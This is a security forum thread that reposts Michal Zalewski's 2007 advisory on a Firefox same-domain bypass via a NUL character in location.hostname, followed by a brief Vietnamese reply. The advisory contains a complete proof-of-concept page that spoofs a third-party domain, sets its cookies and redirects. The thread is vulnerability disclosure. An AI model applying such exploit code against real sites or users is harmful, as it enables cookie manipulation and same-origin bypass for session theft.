[Announcement] Firefox Same-Domain Bypass Vulnerability (NULL Character) |
16/02/2007 18:06:21 (+0700) | #1 | 41773 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Firefox Same-Domain Bypass Vulnerability (NULL Character)
SUMMARY
A vulnerability in the way Firefox handles writes to the 'location.hostname' DOM property allows a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00.
DETAILS
There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1, but quite certainly affecting all recent versions.
The problem lies in how Firefox handles writes to the 'location.hostname' DOM property. It is possible for a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00.
Doing this prompts a peculiar behavior: internally, DOM string variables are not NUL-terminated, and as such, most of checks will consider 'evil.com\x00foo.example.com' to be a part of *.example.com domain. The DNS resolver, however, and much of the remaining browser code, operates on ASCIZ strings native to C/C++ instead, treating the aforementioned example as 'evil.com'.
This makes it possible for evil.com to modify location.hostname as described above, and have the resulting HTTP request still sent to evil.com. Once the new page is loaded, the attacker will be able to set cookies for *.example.com; he'll be also able to alter document.domain accordingly, in order to bypass the same-origin policy for XMLHttpRequest and cross-frame / cross-window data access.
A quick demonstration is available here:
http://lcamtuf.dione.cc/ffhostname.html
Code:
<html>
<head>
<title>Firefox location.hostname vulnerability demo
(lcamtuf@coredump.cx)</title>
</head>
<body style="width: 700px" onload="do_evil(1)">
<script>
function do_evil(onload) {
if (!onload) {
try { location.hostname='lcamtuf.dione.cc\x00www.coredump.cx'; }
catch (err) { alert('Failed to modify location.hostname - probably
not vulnerable.'); }
} else if (location.hostname != 'lcamtuf.dione.cc') {
document.cookie = 'testcookie=1234; domain=.coredump.cx; path=/';
window.location = 'http://lcamtuf.coredump.cx/ffhostname.cgi';
}
}
</script>
<font face="arial" size="+0">
<font size="+1" color="purple"><b>Firefox location.hostname vulnerability
demo</b></font>
<hr size="1">
<p>
This page tests for a serious security vulnerability in Firefox 2.0.0.1
(and
prior). The vulnerability allows malicious websites to manipulate
authentication
cookies for third-party sites, and possibly issue <tt>XMLHttpRequests</tt>
to these
locations, or interact with someone else's frames and windows.
<p>
The test will attempt to impersonate a different site,
<tt>coredump.cx</tt>,
then set a test cookie for that domain. You will be then taken to that
other site
to verify the outcome.
<p>
<b>Note that Javascript is required for the exploit to work.</b>
<p>
<input type=button onclick="do_evil(0)" value="Click here to begin test">
<p>
Comments and questions: <a href="mailto:lcamtuf@coredump.cx">Michal
Zalewski <lcamtuf@coredump.cx></a>
</body>
</html>
If you want to confirm a successful exploitation, check Tools -> Options -> Privacy -> Show Cookies... for coredump.cx after the test; for the demo to succeed, the browser needs to have Javascript enabled, and must accept session cookies.
Impact:
The impact is quite severe: malicious sites can manipulate authentication cookies for third-party webpages, and, by the virtue of bypassing same-origin policy, can possibly tamper with the way these sites are displayed or how they work.
ADDITIONAL INFORMATION
The information has been provided by <mailto:lcamtuf@dione.ids.pl> Michal Zalewski.
The original article can be found at: http://lcamtuf.coredump.cx/ |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Question] Firefox Same-Domain Bypass Vulnerability (NULL Character) |
18/02/2007 06:33:09 (+0700) | #2 | 41885 |
|
xnohat
Moderator
|
Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
|
|
Lại là NULL Character ( %00 ) tưởng nó đã bị tiệt diệt rồi chứ nhỉ |
|
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline |
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|